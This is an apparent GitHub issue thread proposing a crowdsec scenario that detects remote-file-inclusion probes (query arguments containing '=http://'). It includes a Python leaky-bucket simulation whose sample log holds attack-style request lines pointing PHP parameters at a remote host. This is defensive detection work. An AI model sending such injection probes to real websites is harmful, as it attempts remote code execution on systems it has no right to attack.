
php-url-fopen

Open LtSich opened this issue 5 years ago • 3 comments

Based on the fail2ban filter I have made this one for crowdsec. Works fine. This will detect requests with http_args containing =http://, which is generally used to inject code on websites.

```yaml
type: leaky
name: si/php-url-fopen
description: "detect php url fopen"
debug: false
# request with http://
filter: "evt.Meta.log_type == 'http_access-log' && evt.Parsed.http_args contains '=http://'"
groupby: evt.Meta.source_ip
capacity: 3
leakspeed: "600s"
blackhole: 5m
labels:
  service: http
  type: scan
  remediation: true
```

LtSich avatar Jan 28 '21 14:01 LtSich

Hello,

I think this one is a bit too aggressive and might lead to false positives :(

buixor avatar Feb 09 '21 18:02 buixor

This is not a scenario that you can deploy everywhere. You have to know how your websites work. I have 2 servers where I can't use this one because it generates false positives. But on all the others it's fine; this blocks a lot of bots trying to inject remote code on websites.

This scenario needs a big warning before installing it :)

LtSich avatar Feb 18 '21 13:02 LtSich
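To make the behaviour of the scenario above and the false-positive concern in this thread concrete, here is an added, stand-alone Python model of it (example code, not part of this issue, the crowdsec hub or crowdsec itself). It parses constructed access-log lines, applies the same `http_args contains '=http://'` filter, and feeds matches into a per-source-IP leaky bucket with the scenario's `capacity: 3` and `leakspeed: 600s`. The `allowed_params` argument is an assumption added here to show the kind of per-site tuning the thread says is needed: a site whose login page legitimately carries `?redirect=http://...` would otherwise see a normal user trip the bucket. The overflow rule (alert on the first event that pushes the level above capacity) is this example's reading of the leaky-bucket semantics, not a statement about crowdsec internals.

```python
"""Added example: a toy re-implementation of the si/php-url-fopen scenario
(not code from the crowdsec hub) so its detection and false positives
can be studied offline on constructed log lines."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic (combined log format); the IPs are documentation
# ranges and the hosts are invented. The first four lines model a bot probing
# several PHP files with a remote URL; the last four model a legitimate user
# bouncing through a login redirect that also carries "=http://".
SAMPLE_LOG = """\
203.0.113.10 - - [28/Jan/2021:14:01:00 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 512
203.0.113.10 - - [28/Jan/2021:14:01:01 +0000] "GET /wp-content/plugins/a.php?file=http://198.51.100.7/x.txt HTTP/1.1" 404 120
203.0.113.10 - - [28/Jan/2021:14:01:02 +0000] "GET /?cmd=http://198.51.100.7/s.txt HTTP/1.1" 200 300
203.0.113.10 - - [28/Jan/2021:14:01:03 +0000] "GET /?inc=http://198.51.100.7/s.txt HTTP/1.1" 200 300
192.0.2.20 - - [28/Jan/2021:14:05:00 +0000] "GET /login?redirect=http://example.org/account HTTP/1.1" 302 0
192.0.2.20 - - [28/Jan/2021:14:05:05 +0000] "GET /login?redirect=http://example.org/account HTTP/1.1" 302 0
192.0.2.20 - - [28/Jan/2021:14:05:10 +0000] "GET /login?redirect=http://example.org/account HTTP/1.1" 302 0
192.0.2.20 - - [28/Jan/2021:14:05:15 +0000] "GET /login?redirect=http://example.org/account HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \d+$'
)


def parse_line(line):
    """Turn one access-log line into the fields the scenario filter reads:
    Meta.source_ip, Meta.log_type and Parsed.http_args (the raw query string)."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return {
        "log_type": "http_access-log",
        "source_ip": m.group("ip"),
        "ts": ts,
        "http_path": parts.path,
        "http_args": parts.query,
    }


def matches_filter(evt, allowed_params=()):
    """The scenario's filter: log_type must be http_access-log and http_args
    must contain '=http://'. allowed_params is an added, per-site exception
    list (hypothetical) of parameter names known to carry URLs legitimately."""
    if evt["log_type"] != "http_access-log" or "=http://" not in evt["http_args"]:
        return False
    for name, value in parse_qsl(evt["http_args"], keep_blank_values=True):
        if value.startswith("http://") and name not in allowed_params:
            return True
    return False


class LeakyBucket:
    """Leaky bucket keyed on source IP: one unit leaks every `leakspeed`
    seconds; an event that pushes the level above `capacity` overflows.
    Modelling assumption for this example, mirroring capacity: 3 / 600s."""

    def __init__(self, capacity=3, leakspeed=600.0):
        self.capacity = capacity
        self.leakspeed = leakspeed
        self.level = 0.0
        self.last_ts = None

    def add(self, ts):
        if self.last_ts is not None:
            self.level = max(0.0, self.level - (ts - self.last_ts) / self.leakspeed)
        self.last_ts = ts
        self.level += 1.0
        if self.level > self.capacity:
            # Overflow: the scenario would raise an alert here; the bucket is
            # reset so the same IP cannot re-alert on every further request.
            self.level = 0.0
            return True
        return False


def run(log_text, allowed_params=()):
    """Replay the log through the scenario and return the source IPs that
    overflowed the bucket, in order of overflow."""
    buckets = defaultdict(LeakyBucket)
    alerts = []
    for line in log_text.splitlines():
        evt = parse_line(line)
        if evt is None or not matches_filter(evt, allowed_params):
            continue
        if buckets[evt["source_ip"]].add(evt["ts"]):
            alerts.append(evt["source_ip"])
    return alerts


if __name__ == "__main__":
    print("as published:", run(SAMPLE_LOG))                       # both IPs overflow
    print("with redirect allowed:", run(SAMPLE_LOG, ("redirect",)))  # only the bot
```

Run as-is, the bot at 203.0.113.10 overflows on its fourth probe, but so does the ordinary user at 192.0.2.20, which is exactly the false positive described above; passing `("redirect",)` as the allow-list keeps the bot detection and drops the user, which is the sort of per-site knowledge the thread says you need before enabling the scenario.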

yes, I guess we can add it to a collection that is not installed by default, so I'll keep it open for the right time ;)

buixor avatar Feb 18 '21 13:02 buixor